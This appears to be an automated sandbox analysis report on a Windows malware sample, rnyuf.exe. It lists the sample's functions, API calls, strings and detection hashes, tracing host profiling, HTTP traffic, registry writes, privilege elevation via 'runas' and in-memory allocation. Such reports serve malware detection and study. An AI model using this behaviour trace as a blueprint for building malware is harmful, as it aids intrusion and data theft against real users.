Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm
API String ID: 3480331319-3733052814
Opcode ID: 5cdd865d4eea417760e40e966f6d40f233c376454c0fc9c2000f3368be955130
Instruction ID: 56a1fe8e604e9e54450febd419aeda1c66e89808e6033d1d174988f89470017b
Opcode Fuzzy Hash: 5cdd865d4eea417760e40e966f6d40f233c376454c0fc9c2000f3368be955130
Instruction Fuzzy Hash: B351A33CA00229DFCF24DF58C844BAE7BA5AF49318F148199DC19DB2A2C735E906CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0285E9C4, Relevance: 6.4, APIs: 4, Instructions: 373COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0285EA46
_free.LIBCMT ref: 0285EA6A
_free.LIBCMT ref: 0285EBF7
_free.LIBCMT ref: 0285EDC3

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4f2b695338a1a4e717d6133e02b72dde15f9bdfc7ec0fb29074ef71329bf9489
Instruction ID: b4da2c81d41b2acb439c192ba79994bdbc1fdc3ef9884b988d00b78f1664ae0a
Opcode Fuzzy Hash: 4f2b695338a1a4e717d6133e02b72dde15f9bdfc7ec0fb29074ef71329bf9489
Instruction Fuzzy Hash: 55C1097D9002289BDB259F7CDC40BAA7BEAEF45354F14446AEC89E7291E730DB01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02859A5A, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 02859AE1

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c434538e787851e067d0b6415d68969a7c72e1829d1effe04a96ebff6cae0c86
Instruction ID: f46b34f22da2c27ddb587025e746afcbe3f5262a64ca1f5b985228dbcc31035a
Opcode Fuzzy Hash: c434538e787851e067d0b6415d68969a7c72e1829d1effe04a96ebff6cae0c86
Instruction Fuzzy Hash: 84B1153E905669DFEB118F28C8807AEBBF6EF45344F1481AADC49DB241D734A901CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02851094, Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 028510B0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 028510C9

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 6c03938069e6b7b23674db80bc579b142826eceee62ccf849c52df2d9d81859c
Instruction ID: b9ecfa7aa56c0d5494a7007de87814c6f78e1e677c784a41d73323f172668873
Opcode Fuzzy Hash: 6c03938069e6b7b23674db80bc579b142826eceee62ccf849c52df2d9d81859c
Instruction Fuzzy Hash: C001D43E6493319EE62827797C8DB266BA9FF057B5B20037AED1DD50F1EF6148009648

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rnyuf.exe PID: 6176 Parent PID: 5064 rnyuf.exeCOMMON

Executed Functions

Function 00406B90, Relevance: 57.2, APIs: 25, Strings: 5, Instructions: 4701networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(0042CDDC,00000000,00000000,00000000,00000000), ref: 00406BBC
InternetConnectA.WININET(00000000,0040C50C,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00406BDE
HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00406C23

Strings

:::, xrefs: 00409729, 0040979D
152138533219, xrefs: 0040934B, 004093F5, 0040A8E3, 0040AAF7, 0040AEA5
5120, xrefs: 0040BBF2, 0040BDC5
invalid stoi argument, xrefs: 004096B8, 004096E0, 0040ADFD, 0040AE25
stoi argument out of range, xrefs: 004096EA, 0040AE2F

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: InternetOpen$ConnectHttpRequest
String ID: 152138533219$5120$:::$invalid stoi argument$stoi argument out of range
API String ID: 3864186401-2319865195
Opcode ID: 9afbfffe90291105d99ff783e6b7013078feb89fcccbf974fa8f4a60b0543e84
Instruction ID: 5e3e701c9e89102c05e3d31c799ff4722df3bdc0085161f5834632e8110141f4
Opcode Fuzzy Hash: 9afbfffe90291105d99ff783e6b7013078feb89fcccbf974fa8f4a60b0543e84
Instruction Fuzzy Hash: F0832971A002049BDF18EB78CD8579D7B72AF82304F10867EE405BB3D6D77D9A848B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0A0, Relevance: 14.4, APIs: 5, Strings: 2, Instructions: 2128libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00404010: GetVersionExW.KERNEL32(0000011C,?,?,80000001), ref: 00404066

Part of subcall function 004042C0: GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00404316

Part of subcall function 00401DA0: GetUserNameW.ADVAPI32(00000000,00404DB3), ref: 00401DCA
Part of subcall function 00401DA0: GetProcessHeap.KERNEL32(00000008,00404DB3), ref: 00401DDF
Part of subcall function 00401DA0: HeapAlloc.KERNEL32(00000000), ref: 00401DE2
Part of subcall function 00401DA0: GetUserNameW.ADVAPI32(00000000,00404DB3), ref: 00401DF0
Part of subcall function 00401DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,00404DB3,00000000,?,?), ref: 00401E13
Part of subcall function 00401DA0: GetProcessHeap.KERNEL32(00000008,00404DB3), ref: 00401E1E
Part of subcall function 00401DA0: HeapAlloc.KERNEL32(00000000), ref: 00401E21
Part of subcall function 00401DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 00401E31
Part of subcall function 00401DA0: HeapAlloc.KERNEL32(00000000), ref: 00401E34
Part of subcall function 00401DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,00404DB3,00000000,?,?), ref: 00401E5E
Part of subcall function 00401DA0: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00401E71

LoadLibraryA.KERNEL32(00000000), ref: 0040CABA
GetProcAddress.KERNEL32(00000000,000002A8), ref: 0040CB14
FreeLibrary.KERNEL32(00000000), ref: 0040CB1F
GetUserNameW.ADVAPI32(?,00000100), ref: 0040CB92
GetComputerNameExW.KERNEL32(00000002,?,00000100,?,?,?), ref: 0040CC72

Part of subcall function 0040EBB0: Concurrency::cancel_current_task.LIBCPMT ref: 0040EC64

Strings

152138533219, xrefs: 0040CD57
7b2f25, xrefs: 0040CED8

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocProcessUser$AccountLibraryLookupVersion$AddressComputerConcurrency::cancel_current_taskConvertFreeLoadProcString
String ID: 152138533219$7b2f25
API String ID: 1144133639-867942324
Opcode ID: 7a64cc9ea0766b439ccc848d7089b619227bc45c946fd916c7392b912802ecb9
Instruction ID: 0bd73f24f45cf7e28e6136c6e2998ace068b7995f76e21c40a2de5a44afdcdf1
Opcode Fuzzy Hash: 7a64cc9ea0766b439ccc848d7089b619227bc45c946fd916c7392b912802ecb9
Instruction Fuzzy Hash: D5F21D71A002049BDB1CDB28CD8579EB776AF86304F1086BEF409B72D6DB3D9AC48B55

Uniqueness

Uniqueness Score: -1.00%

Function 0041E94F, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0042B608), ref: 0041E9B9
_free.LIBCMT ref: 0041E9A7

Part of subcall function 00416601: HeapFree.KERNEL32(00000000,00000000,?,0041C89A,00000000,00000000,00000000,E8004310,?,0041C8C1,00000000,00000007,00000000,?,0041CCC3,00000000), ref: 00416617
Part of subcall function 00416601: GetLastError.KERNEL32(00000000,?,0041C89A,00000000,00000000,00000000,E8004310,?,0041C8C1,00000000,00000007,00000000,?,0041CCC3,00000000,00000000), ref: 00416629

_free.LIBCMT ref: 0041EB73

Strings

Pacific Daylight Time, xrefs: 0041EA57
Pacific Standard Time, xrefs: 0041EA28
rA, xrefs: 0041E962, 0041EA7D, 0041E968

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time$rA
API String ID: 2155170405-267287639
Opcode ID: d290d8604e53ad3b6e4c8988381d7df6f2e5b41332f9c69560e02e7b4f7ed477
Instruction ID: 8f49c8c0b6aa7a82d0b5abe53b8f79067eb707d5a1f040f0b603246c05aad08d
Opcode Fuzzy Hash: d290d8604e53ad3b6e4c8988381d7df6f2e5b41332f9c69560e02e7b4f7ed477
Instruction Fuzzy Hash: 8E51F875D002199BDB10EB67DC819EE77BCAF45354B14026FE921D32A1E738AEC18B58

Uniqueness

Uniqueness Score: -1.00%

Function 00404010, Relevance: 9.2, APIs: 6, Instructions: 235libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,?,80000001), ref: 00404066
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004040C0
GetProcAddress.KERNEL32(00000000), ref: 004040C7
GetNativeSystemInfo.KERNEL32(?), ref: 00404163

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressHandleInfoModuleNativeProcSystemVersion
String ID:
API String ID: 2167034304-0
Opcode ID: c7caefeb54dbea60bb44514ab6bf838bc24f990853c4234e7795ae14a71cf782
Instruction ID: 411608b20347411c50d7292324355363684884dd5f7210a362c46f6720a577c2
Opcode Fuzzy Hash: c7caefeb54dbea60bb44514ab6bf838bc24f990853c4234e7795ae14a71cf782
Instruction Fuzzy Hash: 9971F7B1E092049BEB24DB69DC497ADB7A4EB85314F5002BFED00A73D1E7798D9087C9

Uniqueness

Uniqueness Score: -1.00%

Function 00402A20, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 295COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(00000000,00000001,?,?,00000000,00000000), ref: 00402A8D

Strings

rundll32.exe, xrefs: 00402C7C
runas, xrefs: 00402A4F

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: ExecuteShell
String ID: runas$rundll32.exe
API String ID: 587946157-4081450877
Opcode ID: e026237fbfd4c33d2ba29d6833fb994047b66613242408dce2098f6cc4444d5b
Instruction ID: 58c1a2c4d8c6fdc34933577bfef0c7a2635c7e4f3b85d3d261b67217479011a6
Opcode Fuzzy Hash: e026237fbfd4c33d2ba29d6833fb994047b66613242408dce2098f6cc4444d5b
Instruction Fuzzy Hash: 59A11B31600109ABEB18DF28CD89B9E7B66EF85304F50853EF814AB2D1D77DD985CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405F80, Relevance: 30.5, APIs: 16, Strings: 1, Instructions: 789COMMON

Download Yara Rule

Strings

(, xrefs: 00406604

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: ba702dd45a5c431e64293c89fb1b1204b5a64e01e80be1b8e49f4f662c1f4244
Instruction ID: 83db7b9dd0cc85c855bac964e2663a521797ffb7c9fe688a15e0bc47cc3e57a7
Opcode Fuzzy Hash: ba702dd45a5c431e64293c89fb1b1204b5a64e01e80be1b8e49f4f662c1f4244
Instruction Fuzzy Hash: B3523B71A002049BDF28DF68CD85B9EB775AF46304F1082BEF405B73D2D7799A948B58

Uniqueness

Uniqueness Score: -1.00%

Function 00401DA0, Relevance: 27.2, APIs: 18, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00404DB3), ref: 00401DCA
GetProcessHeap.KERNEL32(00000008,00404DB3), ref: 00401DDF
HeapAlloc.KERNEL32(00000000), ref: 00401DE2
GetUserNameW.ADVAPI32(00000000,00404DB3), ref: 00401DF0
LookupAccountNameW.ADVAPI32(00000000,?,00000000,00404DB3,00000000,?,?), ref: 00401E13
GetProcessHeap.KERNEL32(00000008,00404DB3), ref: 00401E1E
HeapAlloc.KERNEL32(00000000), ref: 00401E21
GetProcessHeap.KERNEL32(00000008,?), ref: 00401E31
HeapAlloc.KERNEL32(00000000), ref: 00401E34
LookupAccountNameW.ADVAPI32(00000000,?,00000000,00404DB3,00000000,?,?), ref: 00401E5E
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00401E71
GetProcessHeap.KERNEL32(00000000,?), ref: 00401F02
HeapFree.KERNEL32(00000000), ref: 00401F0B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401F10
HeapFree.KERNEL32(00000000), ref: 00401F13
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401F1A
HeapFree.KERNEL32(00000000), ref: 00401F1D
LocalFree.KERNEL32(00000000), ref: 00401F22

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
String ID:
API String ID: 3326663573-0
Opcode ID: 5c21a9efbe99d5bf1771ec63adb79d22084bc28c83091b077b24019fb6065079
Instruction ID: 4a6e7371212e4031177453ca6cee8a06f2b2f205882cb2db8d7ee7705e149be0
Opcode Fuzzy Hash: 5c21a9efbe99d5bf1771ec63adb79d22084bc28c83091b077b24019fb6065079
Instruction Fuzzy Hash: D0516175E00209ABDB209FA5DC85FAFBBBCEF44344F10056AED05A3290DB749E05CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041DBF8, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 0041D8B1: CreateFileW.KERNEL32(00000000,00000000,?,0041DCA1,?,?,00000000,?,0041DCA1,00000000,0000000C), ref: 0041D8CE

GetLastError.KERNEL32 ref: 0041DD0C
__dosmaperr.LIBCMT ref: 0041DD13
GetFileType.KERNEL32(00000000), ref: 0041DD1F
GetLastError.KERNEL32 ref: 0041DD29
__dosmaperr.LIBCMT ref: 0041DD32
CloseHandle.KERNEL32(00000000), ref: 0041DD52
CloseHandle.KERNEL32(0041649E), ref: 0041DE9F
GetLastError.KERNEL32 ref: 0041DED1
__dosmaperr.LIBCMT ref: 0041DED8

Strings

H, xrefs: 0041DE5D

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 9a8440aef2622c683d2d13f995b00e565d1da53da7fb6fa0b3153ce092178612
Instruction ID: f45d129419b544019537036c6fdf8d8cb41214967f35cc648163b538a8bd5e7e
Opcode Fuzzy Hash: 9a8440aef2622c683d2d13f995b00e565d1da53da7fb6fa0b3153ce092178612
Instruction Fuzzy Hash: 7CA12572E041449FCF199F68DC517EE7BB1AB0A324F14015EE811AF3A1DB389987CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00402430, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 004024D1
InternetOpenUrlW.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004024E3
InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 004024FA
InternetCloseHandle.WININET(00000000), ref: 0040250B
InternetCloseHandle.WININET(00000000), ref: 0040250E
InternetCloseHandle.WININET(00000000), ref: 0040251F
InternetCloseHandle.WININET(00000000), ref: 00402522

Strings

runas, xrefs: 004026C5
<, xrefs: 004026AC
Microsoft Internet Explorer, xrefs: 004024CC

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$Open$FileRead
String ID: <$Microsoft Internet Explorer$runas
API String ID: 4294395943-436926838
Opcode ID: 76350bdf9e18ecf07c60f4e981f4c846c3ffe8baa85ef4f55d236b50cd6258bf
Instruction ID: 2b5c1717c82cf1bcfaee824813c5aa76ccd2e0675d1c39cd98a8590ea6e24510
Opcode Fuzzy Hash: 76350bdf9e18ecf07c60f4e981f4c846c3ffe8baa85ef4f55d236b50cd6258bf
Instruction Fuzzy Hash: 8F410431E00219ABDB18DF64CD85BAEBB79EF85300F10807AE511B72D1D77CAA41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041E774, Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041E7F6
_free.LIBCMT ref: 0041E81A
_free.LIBCMT ref: 0041E9A7
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0042B608), ref: 0041E9B9
_free.LIBCMT ref: 0041EB73

Strings

Pacific Daylight Time, xrefs: 0041EA57
Pacific Standard Time, xrefs: 0041EA28
rA, xrefs: 0041E962, 0041EA7D, 0041E968

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$InformationTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time$rA
API String ID: 597776487-267287639
Opcode ID: 8b0e17fd6cb330a020e27496c968ee82e2f4fdbba94155f4cb4c0d1fdbdaed57
Instruction ID: 1857a6ca183768391e0a52e0c310cfa39c40fc20d62c3d7fb1d0d8c0ecb42507
Opcode Fuzzy Hash: 8b0e17fd6cb330a020e27496c968ee82e2f4fdbba94155f4cb4c0d1fdbdaed57
Instruction Fuzzy Hash: 73C15879A002049BDB20AF6BCC41BEABBA9AF46354F14406FEC90D7391E7389DC1C758

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA50, Relevance: 13.6, APIs: 5, Strings: 2, Instructions: 1365libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00404010: GetVersionExW.KERNEL32(0000011C,?,?,80000001), ref: 00404066

Part of subcall function 004042C0: GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00404316

Part of subcall function 00401DA0: GetUserNameW.ADVAPI32(00000000,00404DB3), ref: 00401DCA
Part of subcall function 00401DA0: GetProcessHeap.KERNEL32(00000008,00404DB3), ref: 00401DDF
Part of subcall function 00401DA0: HeapAlloc.KERNEL32(00000000), ref: 00401DE2
Part of subcall function 00401DA0: GetUserNameW.ADVAPI32(00000000,00404DB3), ref: 00401DF0
Part of subcall function 00401DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,00404DB3,00000000,?,?), ref: 00401E13
Part of subcall function 00401DA0: GetProcessHeap.KERNEL32(00000008,00404DB3), ref: 00401E1E
Part of subcall function 00401DA0: HeapAlloc.KERNEL32(00000000), ref: 00401E21
Part of subcall function 00401DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 00401E31
Part of subcall function 00401DA0: HeapAlloc.KERNEL32(00000000), ref: 00401E34
Part of subcall function 00401DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,00404DB3,00000000,?,?), ref: 00401E5E
Part of subcall function 00401DA0: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00401E71

LoadLibraryA.KERNEL32(00000000), ref: 0040CABA
GetProcAddress.KERNEL32(00000000,000002A8), ref: 0040CB14
FreeLibrary.KERNEL32(00000000), ref: 0040CB1F
GetUserNameW.ADVAPI32(?,00000100), ref: 0040CB92
GetComputerNameExW.KERNEL32(00000002,?,00000100,?,?,?), ref: 0040CC72

Part of subcall function 0040EBB0: Concurrency::cancel_current_task.LIBCPMT ref: 0040EC64

Strings

152138533219, xrefs: 0040CD57
7b2f25, xrefs: 0040CED8

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocProcessUser$AccountLibraryLookupVersion$AddressComputerConcurrency::cancel_current_taskConvertFreeLoadProcString
String ID: 152138533219$7b2f25
API String ID: 1144133639-867942324
Opcode ID: 6726bee50807c400948d62aa79d8fb75bd720339d7193c7489181e7e04b59fdd
Instruction ID: b7c5e4e26636081960b60e2d6e04c8a2bdc39f5ed75c2de5dfaf4cd18ab87869
Opcode Fuzzy Hash: 6726bee50807c400948d62aa79d8fb75bd720339d7193c7489181e7e04b59fdd
Instruction Fuzzy Hash: 60B2F871E001144BEF29DB68CD8979DB6369B82304F1086BEE409B72D6DB3D9FC88B55

Uniqueness

Uniqueness Score: -1.00%

Function 0287003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0287024D

Strings

kernel32.dll, xrefs: 0287008F, 02870095
cess, xrefs: 0287018D

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: 5fa6f7411ca1584ffe64ab86dad944b4d53b84a92bfe24146dfc024df7a7a4b4
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: 7B526979A01229DFDB64CF58C984BACBBB1BF09304F1480D9E94DAB351DB30AA85DF15

Uniqueness

Uniqueness Score: -1.00%

Function 00412943, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00412875), ref: 00412965
GetFileInformationByHandle.KERNEL32(?,?), ref: 004129BF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00412875,?,000000FF,00000000,00000000), ref: 00412A4D
__dosmaperr.LIBCMT ref: 00412A54
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00412A91

Part of subcall function 00412CB9: __dosmaperr.LIBCMT ref: 00412CEE

Strings

u(A, xrefs: 0041295D

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID: u(A
API String ID: 1206951868-4059933701
Opcode ID: 4bfe7f256ae4700fa39f8659a13ca9f0b4f5978f8abe38c296e88adaabae0c9b
Instruction ID: eb81c5419ffea4406b0efb4a1d543400d364a86dfd5a8c9f72f57ba91cdce05f
Opcode Fuzzy Hash: 4bfe7f256ae4700fa39f8659a13ca9f0b4f5978f8abe38c296e88adaabae0c9b
Instruction Fuzzy Hash: 44418C71900604AFCB34DFA6DD459EFBBF9EF88340B04452EF856D3610E678A891CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00403D90, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00000001,w@,?,00000000), ref: 00403DD1
RegQueryValueExA.KERNEL32(w@,?,00000000,00000000,?,00000400,?,00000000), ref: 00403DF9
RegCloseKey.ADVAPI32(w@,?,00000000), ref: 00403E02

Strings

5s@, xrefs: 004045F3, 004045FD, 00404606
w@, xrefs: 00403DC0, 00403DFF, 00403DF6, 00403DCA

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: 5s@$w@
API String ID: 3677997916-1291319353
Opcode ID: 405ba0b736829c4baaaca2805801400452ee1c60a5a374b0fa8846950752a091
Instruction ID: 38721d32f762b9fefe1b8a736805a5cf5728d919649d99199a1cf5c7eaf7711f
Opcode Fuzzy Hash: 405ba0b736829c4baaaca2805801400452ee1c60a5a374b0fa8846950752a091
Instruction Fuzzy Hash: F231D671200109AFEB18CF24CD45BEE7B79EB85309F10426DF945A72C1DB79DB858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405D50, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 188COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00405E9F

Strings

jjjj, xrefs: 004069BB
jjj, xrefs: 004069D6
jjh, xrefs: 004069A4

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: __fread_nolock
String ID: jjh$jjj$jjjj
API String ID: 2638373210-3331015499
Opcode ID: 2b14e37df9ac993b0cf4f6d4b102ca4b59c385dc7ca8370b3dad647602495f1b
Instruction ID: 6dcfc28a1c27a10699bf76249715ad2168f080e34cf67132610363a96dbcee28
Opcode Fuzzy Hash: 2b14e37df9ac993b0cf4f6d4b102ca4b59c385dc7ca8370b3dad647602495f1b
Instruction Fuzzy Hash: B15134716101056BDB08EB39CD86BDF3A25EF86304F40453EF814AB2D2D67DDA90CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403EC0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNEL32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00403EF1
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000002,80000001), ref: 00403F10
RegSetValueExA.KERNEL32(80000001,?,00000000,00000001,?,?), ref: 00403F3E

Strings

w@, xrefs: 00403EC0

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateOpenValue
String ID: w@
API String ID: 2195001959-4069734973
Opcode ID: 41fb20a165c6435708f3c0bf82a33fa358131526ea69a5f21b2e802b8899568f
Instruction ID: 5caf11502c9af04d8941fdd4e89bb11826fe9fe2b1a184a263c0211251d4882b
Opcode Fuzzy Hash: 41fb20a165c6435708f3c0bf82a33fa358131526ea69a5f21b2e802b8899568f
Instruction Fuzzy Hash: 2041D570210109AFEB18CF28CD85BDD7B76EB45305F608229FD05A62D5D779DAC48B98

Uniqueness

Uniqueness Score: -1.00%

Function 00417645, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(R'A,?,00412752,?,?,?,?), ref: 0041764D
GetLastError.KERNEL32(?,00412752,?,?,?,?), ref: 00417657
__dosmaperr.LIBCMT ref: 0041765E

Strings

R'A, xrefs: 0041764A

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: DeleteErrorFileLast__dosmaperr
String ID: R'A
API String ID: 1545401867-1265098927
Opcode ID: 642908a0dadcc0e497a82d1997887354a94cf152b244e97cb43b380a1c2970e3
Instruction ID: 056ef9c38fad87361dd2ee2fac34696856f64910ee6b24fca729f867d5a66b34
Opcode Fuzzy Hash: 642908a0dadcc0e497a82d1997887354a94cf152b244e97cb43b380a1c2970e3
Instruction Fuzzy Hash: B5D02232308208378B202FF6BC0C86B3F1C8E803343400676F82CC02A0DE39C8928548

Uniqueness

Uniqueness Score: -1.00%

Function 004049F0, Relevance: 6.3, APIs: 4, Instructions: 281COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?), ref: 00404A0D

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 979b42e21b32d90a2ebfd9e98383705e0bd9c723ee32b2bb6f57d1f4597c0e97
